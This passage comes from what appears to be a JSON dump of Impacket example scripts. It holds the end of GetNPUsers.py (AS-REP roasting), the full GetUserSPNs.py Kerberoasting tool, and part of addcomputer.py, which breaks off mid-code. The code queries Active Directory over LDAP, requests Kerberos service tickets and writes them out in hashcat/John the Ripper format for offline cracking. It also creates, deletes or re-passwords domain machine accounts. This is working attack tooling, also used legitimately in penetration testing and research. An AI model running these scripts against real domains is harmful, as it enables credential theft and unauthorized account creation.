user\")\n print(\"\\n2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set\")\n print(\"\\n\\tGetNPUsers.py contoso.com/emily:password or GetNPUsers.py contoso.com/emily\")\n print(\"\\nThis will list all the users in the contoso.com domain that have UF_DONT_REQUIRE_PREAUTH set. \\nHowever \"\n \"it will require you to have emily\\'s password. (If you don\\'t specify it, it will be asked by the script)\")\n print(\"\\n3. Request TGTs for all users\")\n print(\"\\n\\tGetNPUsers.py contoso.com/emily:password -request or GetNPUsers.py contoso.com/emily\")\n print(\"\\n4. Request TGTs for users in a file\")\n print(\"\\n\\tGetNPUsers.py -no-pass -usersfile users.txt contoso.com/\")\n print(\"\\nFor this operation you don\\'t need credentials.\")\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n if options.k is False and options.no_pass is True and username == '' and options.usersfile is None:\n logging.critical('If the -no-pass option was specified, but Kerberos (-k) is not used, then a username or the -usersfile option should be specified!')\n sys.exit(1)\n\n if options.outputfile is not None:\n options.request = True\n\n try:\n executer = GetUserNoPreAuth(username, password, domain, options)\n executer.run()\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error(str(e))\n" }, { "path": "examples/GetUserSPNs.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This module will try to find Service Principal Names that are associated with normal user account.\n# Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request\n# will encrypt the ticket with the account the SPN is running under, this could be used for an offline\n# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.\n# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at\n# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf\n#\n# Original idea of implementing this in Python belongs to @skelsec and his\n# https://github.com/skelsec/PyKerberoast project\n#\n# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.\n# Also, disabled accounts won't be shown.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# ToDo:\n# [X] Add the capability for requesting TGS and output them in JtR/hashcat format\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport logging\nimport sys\nfrom datetime import datetime\nfrom binascii import hexlify, unhexlify\n\nfrom pyasn1.codec.der import decoder\nfrom impacket import version\nfrom impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_TRUSTED_FOR_DELEGATION, \\\n UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity, ldap_login\nfrom impacket.krb5 import constants\nfrom impacket.krb5.asn1 import TGS_REP, AS_REP\nfrom impacket.krb5.ccache import CCache\nfrom impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS\nfrom impacket.krb5.types import Principal\nfrom impacket.ldap import ldap, ldapasn1\nfrom impacket.ntlm import compute_lmhash, compute_nthash\n\n\nclass GetUserSPNs:\n @staticmethod\n def printTable(items, header):\n colLen = []\n for i, col in enumerate(header):\n rowMaxLen = max([len(row[i]) for row in items])\n colLen.append(max(rowMaxLen, len(col)))\n\n outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])\n\n # Print header\n print(outputFormat.format(*header))\n print(' '.join(['-' * itemLen for itemLen in colLen]))\n\n # And now the rows\n for row in items:\n print(outputFormat.format(*row))\n\n def __init__(self, username, password, user_domain, target_domain, cmdLineOptions):\n self.__username = username\n self.__password = password\n self.__domain = user_domain\n self.__target = None\n self.__targetDomain = target_domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__no_preauth = cmdLineOptions.no_preauth\n self.__outputFileName = cmdLineOptions.outputfile\n self.__usersFile = cmdLineOptions.usersfile\n self.__aesKey = cmdLineOptions.aesKey\n self.__doKerberos = cmdLineOptions.k\n self.__requestTGS = cmdLineOptions.request\n # [!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost\n self.__kdcIP = cmdLineOptions.dc_ip\n self.__kdcHost = cmdLineOptions.dc_host\n self.__saveTGS = cmdLineOptions.save\n self.__requestUser = cmdLineOptions.request_user\n self.__stealth = cmdLineOptions.stealth\n self.__machineOnly = cmdLineOptions.machine_only\n self.__requestMachine = cmdLineOptions.request_machine\n\n if cmdLineOptions.hashes is not None:\n self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n\n\n # Create the baseDN\n domainParts = self.__targetDomain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n # We can't set the KDC to a custom IP or Hostname when requesting things cross-domain\n # because then the KDC host will be used for both\n # the initial and the referral ticket, which breaks stuff.\n if user_domain != self.__targetDomain and (self.__kdcIP or self.__kdcHost):\n logging.warning('KDC IP address and hostname will be ignored because of cross-domain targeting.')\n self.__kdcIP = None\n self.__kdcHost = None\n\n @staticmethod\n def getUnixTime(t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def getTGT(self):\n domain, _, TGT, _ = CCache.parseFile(self.__domain)\n if TGT is not None:\n return TGT\n\n # No TGT in cache, request it\n userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n # In order to maximize the probability of getting session tickets with RC4 etype, we will convert the\n # password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the\n # cleartext password.\n # If no clear text password is provided, we just go with the defaults.\n if self.__password != '' and (self.__lmhash == '' and self.__nthash == ''):\n try:\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, '', self.__domain,\n compute_lmhash(self.__password),\n compute_nthash(self.__password), self.__aesKey,\n kdcHost=self.__kdcIP)\n except Exception as e:\n logging.debug('TGT: %s' % str(e))\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,\n unhexlify(self.__lmhash),\n unhexlify(self.__nthash), self.__aesKey,\n kdcHost=self.__kdcIP)\n\n else:\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,\n unhexlify(self.__lmhash),\n unhexlify(self.__nthash), self.__aesKey,\n kdcHost=self.__kdcIP)\n TGT = {}\n TGT['KDC_REP'] = tgt\n TGT['cipher'] = cipher\n TGT['sessionKey'] = sessionKey\n\n return TGT\n\n def outputTGS(self, ticket, oldSessionKey, sessionKey, username, spn, fd=None):\n if self.__no_preauth:\n decodedTGS = decoder.decode(ticket, asn1Spec=AS_REP())[0]\n else:\n decodedTGS = decoder.decode(ticket, asn1Spec=TGS_REP())[0]\n # According to RFC4757 (RC4-HMAC) the cipher part is like:\n # struct EDATA {\n # struct HEADER {\n # OCTET Checksum[16];\n # OCTET Confounder[8];\n # } Header;\n # OCTET Data[0];\n # } edata;\n #\n # In short, we're interested in splitting the checksum and the rest of the encrypted data\n #\n # Regarding AES encryption type (AES128 CTS HMAC-SHA1 96 and AES256 CTS HMAC-SHA1 96)\n # last 12 bytes of the encrypted ticket represent the checksum of the decrypted \n # ticket\n if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'],\n spn.replace(':', '~'),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())\n if fd is None:\n print(entry)\n else:\n fd.write(entry + '\\n')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:\n entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (\n constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'],\n spn.replace(':', '~'),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())\n if fd is None:\n print(entry)\n else:\n fd.write(entry + '\\n')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:\n entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (\n constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'],\n spn.replace(':', '~'),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())\n if fd is None:\n print(entry)\n else:\n fd.write(entry + '\\n')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS['ticket']['realm'],\n spn.replace(':', '~'),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),\n hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())\n if fd is None:\n print(entry)\n else:\n fd.write(entry + '\\n')\n else:\n logging.error('Skipping %s/%s due to incompatible e-type %d' % (\n decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],\n decodedTGS['ticket']['enc-part']['etype']))\n\n if self.__saveTGS is True:\n # Save the ticket\n logging.debug('About to save TGS for %s' % username)\n ccache = CCache()\n try:\n ccache.fromTGS(ticket, oldSessionKey, sessionKey)\n ccache.saveFile('%s.ccache' % username)\n except Exception as e:\n logging.error(str(e))\n\n def run(self):\n if self.__usersFile:\n self.request_users_file_TGSs()\n return\n\n # Connect to LDAP\n ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, target_domain=self.__targetDomain, fqdn=True)\n # updating \"self.__target\" as it may have changed in the ldap_login processing\n self.__target = ldapConnection._dstHost\n\n # Building the search filter\n filter_spn = \"servicePrincipalName=*\"\n filter_person = \"objectCategory=person\"\n filter_computer = \"objectCategory=computer\"\n filter_not_disabled = \"!(userAccountControl:1.2.840.113556.1.4.803:=2)\"\n\n if self.__machineOnly is True:\n logging.debug('-machine-only flag detected')\n searchFilter = \"(&\"\n searchFilter += \"(\" + filter_computer + \")\"\n searchFilter += \"(\" + filter_not_disabled + \")\"\n\n # not updating to F-string due to other code using old string formatting\n if self.__requestMachine is not None:\n logging.debug('Including machine account (%s) in LDAP query filter' % self.__requestMachine)\n searchFilter += '(sAMAccountName:=%s)' % (self.__requestMachine)\n\n # traditional SPN based on person search\n else:\n searchFilter = \"(&\"\n searchFilter += \"(\" + filter_person + \")\"\n searchFilter += \"(\" + filter_not_disabled + \")\"\n\n if self.__requestUser is not None:\n searchFilter += '(sAMAccountName:=%s)' % self.__requestUser\n\n if self.__stealth is True:\n logging.warning('Stealth option may cause huge memory consumption / out-of-memory errors on very large domains.')\n else:\n searchFilter += \"(\" + filter_spn + \")\"\n\n\n\n searchFilter += ')'\n\n try:\n # Microsoft Active Directory set an hard limit of 1000 entries returned by any search\n paged_search_control = ldapasn1.SimplePagedResultsControl(criticality=True, size=1000)\n\n resp = ldapConnection.search(searchFilter=searchFilter,\n attributes=['servicePrincipalName', 'sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n searchControls=[paged_search_control])\n\n except ldap.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n # We should never reach this code as we use paged search now\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n resp = e.getAnswers()\n pass\n else:\n raise\n\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n for item in resp:\n if isinstance(item, ldapasn1.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n SPNs = []\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n delegation = ''\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = str(attribute['vals'][0])\n if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:\n delegation = 'unconstrained'\n elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:\n delegation = 'constrained'\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'servicePrincipalName':\n for spn in attribute['vals']:\n SPNs.append(spn.asOctets().decode('utf-8'))\n\n if mustCommit is True:\n if int(userAccountControl) & UF_ACCOUNTDISABLE:\n logging.debug('Bypassing disabled account %s ' % sAMAccountName)\n else:\n for spn in SPNs:\n answers.append([spn, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation])\n except Exception as e:\n logging.error('Skipping item, cannot process due to error %s' % str(e))\n pass\n\n if len(answers) > 0:\n self.printTable(answers, header=[\"ServicePrincipalName\", \"Name\", \"MemberOf\", \"PasswordLastSet\", \"LastLogon\",\n \"Delegation\"])\n print('\\n\\n')\n\n if self.__requestTGS is True or self.__requestUser is not None or self.__requestMachine is not None:\n # Let's get unique user names and a SPN to request a TGS for\n users = dict((vals[1], vals[0]) for vals in answers)\n\n # Get a TGT for the current user\n TGT = self.getTGT()\n\n if self.__outputFileName is not None:\n fd = open(self.__outputFileName, 'w+')\n else:\n fd = None\n\n for user, SPN in users.items():\n sAMAccountName = user\n downLevelLogonName = self.__targetDomain + \"\\\\\" + sAMAccountName\n\n try:\n principalName = Principal()\n principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value\n principalName.components = [downLevelLogonName]\n\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,\n self.__kdcIP,\n TGT['KDC_REP'], TGT['cipher'],\n TGT['sessionKey'])\n self.outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName,\n self.__targetDomain + \"/\" + sAMAccountName, fd)\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error('Principal: %s - %s' % (downLevelLogonName, str(e)))\n\n if fd is not None:\n fd.close()\n\n else:\n print(\"No entries found!\")\n\n def request_users_file_TGSs(self):\n\n with open(self.__usersFile) as fi:\n usernames = [line.strip() for line in fi]\n\n self.request_multiple_TGSs(usernames)\n\n def request_multiple_TGSs(self, usernames):\n if self.__outputFileName is not None:\n fd = open(self.__outputFileName, 'w+')\n else:\n fd = None\n \n if self.__no_preauth:\n for username in usernames:\n try:\n no_preauth_pincipal = Principal(self.__no_preauth, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=no_preauth_pincipal,\n password=self.__password,\n domain=self.__domain,\n lmhash=(self.__lmhash),\n nthash=(self.__nthash),\n aesKey=self.__aesKey,\n kdcHost=self.__kdcHost,\n serverName=username,\n kerberoast_no_preauth=True)\n self.outputTGS(tgt, oldSessionKey, sessionKey, username, username, fd)\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error('Principal: %s - %s' % (username, str(e)))\n\n if fd is not None:\n fd.close()\n else:\n # Get a TGT for the current user\n TGT = self.getTGT()\n \n for username in usernames:\n try:\n principalName = Principal()\n principalName.type = constants.PrincipalNameType.NT_ENTERPRISE.value\n principalName.components = [username]\n\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,\n self.__kdcIP,\n TGT['KDC_REP'], TGT['cipher'],\n TGT['sessionKey'])\n self.outputTGS(tgs, oldSessionKey, sessionKey, username, username, fd)\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error('Principal: %s - %s' % (username, str(e)))\n\n if fd is not None:\n fd.close()\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Queries target domain for SPNs that are running \"\n \"under a user account\")\n\n parser.add_argument('target', action='store', help='domain[/username[:password]]')\n parser.add_argument('-target-domain', action='store',\n help='Domain to query/request if different than the domain of the user. '\n 'Allows for Kerberoasting across trusts.')\n parser.add_argument('-no-preauth', action='store', help='account that does not require preauth, to obtain Service Ticket'\n ' through the AS')\n parser.add_argument('-stealth', action='store_true', help='Removes the (servicePrincipalName=*) filter from the LDAP query for added stealth. '\n 'May cause huge memory consumption / errors on large domains.')\n parser.add_argument('-machine-only', action='store_true', default=False, help='Queries for machine accounts only, by adjusting `objectCategory=person` to `objectCategory=computer`. Active Directory may limit results to 1,000 objects by default. LDAP paging is required to retrieve more.')\n\n parser.add_argument('-usersfile', help='File with user per line to test')\n\n parser.add_argument('-request', action='store_true', default=False, help='Requests TGS for users and output them '\n 'in JtR/hashcat format (default False)')\n exclusive_request_group = parser.add_mutually_exclusive_group()\n exclusive_request_group.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '\n 'to the user specified (just the username, no domain needed)')\n\n exclusive_request_group.add_argument('-request-machine', metavar='machinename', help='Requests TGS for the SPN associated to the machine specified. Example: `workstation01$`')\n\n parser.add_argument('-save', action='store_true', default=False, help='Saves TGS requested to disk. Format is '\n '.ccache. Auto selects -request')\n parser.add_argument('-outputfile', action='store',\n help='Output filename to write ciphers in JtR/hashcat format. Auto selects -request')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output.')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\",\n help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) '\n 'specified in the target parameter. Ignored'\n 'if -target-domain is specified.')\n group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '\n 'If ommited, the domain part (FQDN) '\n 'specified in the account parameter will be used')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.no_preauth and options.usersfile is None:\n logging.error('You have to specify -usersfile when -no-preauth is supplied. Usersfile must contain'\n ' a list of SPNs and/or sAMAccountNames to Kerberoast.')\n sys.exit(1)\n\n userDomain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if userDomain == '':\n logging.critical('userDomain should be specified!')\n sys.exit(1)\n\n if options.target_domain:\n targetDomain = options.target_domain\n else:\n targetDomain = userDomain\n\n if options.save is True or options.outputfile is not None:\n options.request = True\n\n # auto enable machineonly, and request flag on -request-machine\n if options.request_machine is not None:\n options.machine_only = True\n\n try:\n executer = GetUserSPNs(username, password, userDomain, targetDomain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/addcomputer.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will add a computer account to the domain and set its password.\n# Allows to use SAMR over SMB (this way is used by modern Windows computer when\n# adding machines through the GUI) and LDAPS.\n# Plain LDAP is not supported, as it doesn't allow setting the password.\n#\n# Author:\n# JaGoTu (@jagotu)\n#\n# Reference for:\n# SMB, SAMR, LDAP\n#\n# ToDo:\n# [ ]: Complete the process of joining a client computer to a domain via the SAMR protocol\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity\nfrom impacket.dcerpc.v5 import samr, epm, transport\nfrom impacket.spnego import SPNEGO_NegTokenInit, TypesMech\n\nfrom impacket.examples.utils import init_ldap_session, ldap3_kerberos_login\n\nimport ldap3\nimport argparse\nimport logging\nimport sys\nimport string\nimport random\nimport ssl\nfrom binascii import unhexlify\n\n\nclass ADDCOMPUTER:\n def __init__(self, username, password, domain, cmdLineOptions):\n self.options = cmdLineOptions\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__hashes = cmdLineOptions.hashes\n self.__aesKey = cmdLineOptions.aesKey\n self.__doKerberos = cmdLineOptions.k\n self.__target = cmdLineOptions.dc_host\n self.__kdcHost = cmdLineOptions.dc_host\n self.__computerName = cmdLineOptions.computer_name\n self.__computerPassword = cmdLineOptions.computer_pass\n self.__method = cmdLineOptions.method\n self.__port = cmdLineOptions.port\n self.__domainNetbios = cmdLineOptions.domain_netbios\n self.__noAdd = cmdLineOptions.no_add\n self.__delete = cmdLineOptions.delete\n self.__targetIp = cmdLineOptions.dc_ip\n self.__baseDN = cmdLineOptions.baseDN\n self.__computerGroup = cmdLineOptions.computer_group\n\n if self.__targetIp is not None:\n self.__kdcHost = self.__targetIp\n\n if self.__method not in ['SAMR', 'LDAPS']:\n raise ValueError(\"Unsupported method %s\" % self.__method)\n\n if self.__doKerberos and cmdLineOptions.dc_host is None:\n raise ValueError(\"Kerberos auth requires DNS name of the target DC. Use -dc-host.\")\n\n if self.__method == 'LDAPS' and not '.' in self.__domain:\n logging.warning('\\'%s\\' doesn\\'t look like a FQDN. Generating baseDN will probably fail.' % self.__domain)\n\n if cmdLineOptions.hashes is not None:\n self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n if self.__computerName is None:\n if self.__noAdd:\n raise ValueError(\"You have to provide a computer name when using -no-add.\")\n elif self.__delete:\n raise ValueError(\"You have to provide a computer name when using -delete.\")\n else:\n if self.__computerName[-1] != '$':\n self.__computerName += '$'\n\n if self.__computerPassword is None:\n self.__computerPassword = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))\n\n if self.__target is None:\n if not '.' in self.__domain:\n logging.warning('No DC host set and \\'%s\\' doesn\\'t look like a FQDN. DNS resolution of short names will probably fail.' % self.__domain)\n self.__target = self.__domain\n\n if self.__port is None:\n if self.__method == 'SAMR':\n self.__port = 445\n elif self.__method == 'LDAPS':\n self.__port = 636\n\n if self.__domainNetbios is None:\n self.__domainNetbios = self.__domain\n\n if self.__method == 'LDAPS' and self.__baseDN is None:\n # Create the baseDN\n domainParts = self.__domain.split('.')\n self.__baseDN = ''\n for i in domainParts:\n self.__baseDN += 'dc=%s,' % i\n # Remove last ','\n self.__baseDN = self.__baseDN[:-1]\n\n if self.__method == 'LDAPS' and self.__computerGroup is None:\n self.__computerGroup = 'CN=Computers,' + self.__baseDN\n\n\n\n def run_samr(self):\n if self.__targetIp is not None:\n stringBinding = epm.hept_map(self.__targetIp, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')\n else:\n stringBinding = epm.hept_map(self.__target, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n rpctransport.set_dport(self.__port)\n\n if self.__targetIp is not None:\n rpctransport.setRemoteHost(self.__targetIp)\n rpctransport.setRemoteName(self.__target)\n\n if hasattr(rpctransport, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey)\n\n rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n self.doSAMRAdd(rpctransport)\n\n def run_ldaps(self):\n try:\n ldapServer, ldapConn = init_ldap_session(self.__domain, self.__username, self.__password, self.__lmhash, self.__nthash, self.__doKerberos, self.__targetIp, self.__target, self.__aesKey, True)\n\n if self.__noAdd or self.__delete:\n if not self.LDAPComputerExists(ldapConn, self.__computerName):\n raise Exception(\"Account %s not found in %s!\" % (self.__computerName, self.__baseDN))\n\n computer = self.LDAPGetComputer(ldapConn, self.__computerName)\n\n if self.__delete:\n res = ldapConn.delete(computer.entry_dn)\n message = \"delete\"\n else:\n res = ldapConn.modify(computer.entry_dn, {'unicodePwd': [(ldap3.MODIFY_REPLACE, ['\"{}\"'.format(self.__computerPassword).encode('utf-16-le')])]})\n message = \"set password for\"\n\n\n if not res:\n if ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:\n raise Exception(\"User %s doesn't have right to %s %s!\" % (self.__username, message, self.__computerName))\n else:\n raise Exception(str(ldapConn.result))\n else:\n if self.__noAdd:\n logging.info(\"Succesfully set password of %s to %s.\" % (self.__computerName, self.__computerPassword))\n else:\n logging.info(\"Succesfully deleted %s.\" % self.__computerName)\n\n else:\n if self.__computerName is not None:\n if self.LDAPComputerExists(ldapConn, self.__computerName):\n raise Exception(\"Account %s already exists! If you just want to set a password, use -no-add.\" % self.__computerName)\n else:\n while True:\n self.__computerName = self.generateComputerName()\n if not self.LDAPComputerExists(ldapConn, self.__computerName):\n break\n\n\n computerHostname = self.__computerName[:-1]\n computerDn = ('CN=%s,%s' % (computerHostname, self.__computerGroup))\n\n # Default computer SPNs\n spns = [\n 'HOST/%s' % computerHostname,\n 'HOST/%s.%s' % (computerHostname, self.__domain),\n 'RestrictedKrbHost/%s' % computerHostname,\n 'RestrictedKrbHost/%s.%s' % (computerHostname, self.__domain),\n ]\n ucd = {\n 'dnsHostName': '%s.%s' % (computerHostname, self.__domain),\n 'userAccountControl': 0x1000,\n 'servicePrincipalName': spns,\n 'sAMAccountName': self.__computerName,\n 'unicodePwd': ('\"%s\"' % self.__computerPassword).encode('utf-16-le')\n }\n\n res = ldapConn.add(computerDn, ['top','person','organizationalPerson','user','computer'], ucd)\n if not res:\n if ldapConn.result['result'] == ldap3.core.results.RESULT_UNWILLING_TO_PERFORM:\n error_code = int(ldapConn.result['message'].split(':')[0].strip(), 16)\n if error_code == 0x216D:\n raise Exception(\"User %s machine quota exceeded!\" % self.__username)\n else:\n raise Exception(str(ldapConn.result))\n elif ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:\n raise Exception(\"User %s doesn't have right to create a machine account!\" % self.__username)\n else:\n raise Exception(str(ldapConn.result))\n else:\n logging.info(\"Successfully added machine account %s with password %s.\" % (self.__computerName, self.__computerPassword))\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n\n logging.critical(str(e))\n\n\n def LDAPComputerExists(self, connection, computerName):\n connection.search(self.__baseDN, '(sAMAccountName=%s)' % computerName)\n return len(connection.entries) ==1\n\n def LDAPGetComputer(self, connection, computerName):\n connection.search(self.__baseDN, '(sAMAccountName=%s)' % computerName)\n return connection.entries[0]\n\n def generateComputerName(self):\n return 'DESKTOP-' + (''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) + '$')\n\n def doSAMRAdd(self, rpctransport):\n dce = rpctransport.get_dce_rpc()\n servHandle = None\n domainHandle = None\n userHandle = None\n try:\n dce.connect()\n dce.bind(samr.MSRPC_UUID_SAMR)\n\n samrConnectResponse = samr.hSamrConnect5(dce, '\\\\\\\\%s\\x00' % self.__target,\n samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN )\n servHandle = samrConnectResponse['ServerHandle']\n\n samrEnumResponse = samr.hSamrEnumerateDomainsInSamServer(dce, servHandle)\n domains = samrEnumResponse['Buffer']['Buffer']\n domainsWithoutBuiltin = list(filter(lambda x : x['Name'].lower() != 'builtin', domains))\n\n if len(domainsWithoutBuiltin) > 1:\n domain = list(filter(lambda x : x['Name'].lower() == self.__domainNetbios, domains))\n if len(domain) != 1:\n logging.critical(\"This server provides multiple domains and '%s' isn't one of them.\", self.__domainNetbios)\n logging.critical(\"Available domain(s):\")\n for domain in domains:\n logging.error(\" * %s\" % domain['Name'])\n logging.critical(\"Consider using -domain-netbios argument to specify which one you meant.\")\n raise Exception()\n else:\n selectedDomain = domain[0]['Name']\n else:\n selectedDomain = domainsWithoutBuiltin[0]['Name']\n\n samrLookupDomainResponse = samr.hSamrLookupDomainInSamServer(dce, servHandle, selectedDomain)\n domainSID = samrLookupDomainResponse['DomainId']\n\n if 